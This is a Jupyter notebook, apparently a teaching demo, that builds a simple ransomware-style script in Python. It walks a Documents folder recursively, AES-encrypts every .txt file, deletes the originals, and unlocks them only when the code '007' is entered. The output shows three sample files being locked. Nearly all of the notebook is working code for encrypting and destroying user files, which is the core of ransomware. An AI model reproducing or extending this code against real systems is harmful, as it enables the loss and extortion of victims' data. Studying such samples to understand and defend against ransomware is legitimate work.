In [121]:
# Install the cryptography package that provides AES functions.
# Advanced Encryption Standard, is a widely used symmetric encryption algorithm.

#!pip install pycryptodome

In [122]:
from pathlib import Path
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad # Adds bytes to make plaintext length align with AES block size (16 bytes blocks).
from Crypto.Util.Padding import unpad # Removes extra bytes after decryption.
import os

In [123]:
key = b"Sixteen byte key" # Static 16 byte secret suitable for AES-128.
iv = os.urandom(16) # IV (initialization vector): random bytes added to each encryption session.

In [124]:
def encrypt(data):
  cipher = AES.new(key, AES.MODE_CBC, iv) # Create an AES object using the secret key and IV.
  padded_data = pad(data, AES.block_size)

  return cipher.encrypt(padded_data)

In [125]:
def decrypt(data):
  cipher = AES.new(key, AES.MODE_CBC, iv) # Create another AES instance using the same key and IV.
  unpadded_data = unpad(cipher.decrypt(data), AES.block_size)

  return unpadded_data

In [126]:
# Open target files in binary mode, read everything.
# Write new files with .encrypted appended.
# Delete original plaintext file.

def encrypt_file(path):
  with open(path, "rb") as f:
    data = f.read()

  with open(str(path) + ".encrypted", "wb") as f:
    f.write(iv + encrypt(data)) # Prepend IV to the encrypted data.

  os.remove(str(path))

In [127]:
# Open encrypted file and read first 16 bytes (the IV).
# Read rest as encrypted data.
# Write decrypted result to original filename.
# Delete encrypted file.

def decrypt_file(path):
  with open(str(path)+".encrypted", "rb") as f:
    iv_from_file = f.read(16) # Read the IV from the file
    data = f.read()

  with open(str(path), "wb") as f:
    f.write(decrypt(data))

  os.remove(str(path) + ".encrypted")

In [128]:
# Find all files in Documents directory, ending in .txt.

def get_files (directory, ext):
  paths = list(Path(directory).rglob("*" + ext))
  return paths

In [129]:
directory = os.path.join(os.getcwd(), "Documents")

ext = ".txt"
paths = get_files(directory, ext)

# Encrypt all the files.
print ("The following files will be encrypted:\n")
for path in paths:
  print(path)
  encrypt_file(path)

The following files will be encrypted:

/content/Documents/file_1.txt
/content/Documents/file_3.txt
/content/Documents/file_2.txt


In [130]:
paths_encrypted = get_files(directory, ".txt.encrypted")

print ("The following files are now encrypted:\n")
for path in paths_encrypted:
  print(path)

# Secret code is "007".
while (True):
  print ("\nEnter decryption code: ")
  code = input().rstrip()

  if code == "007":
    for path in paths:
      decrypt_file(path)
    break

The following files are now encrypted:

/content/Documents/file_3.txt.encrypted
/content/Documents/file_1.txt.encrypted
/content/Documents/file_2.txt.encrypted

Enter decryption code: 
007
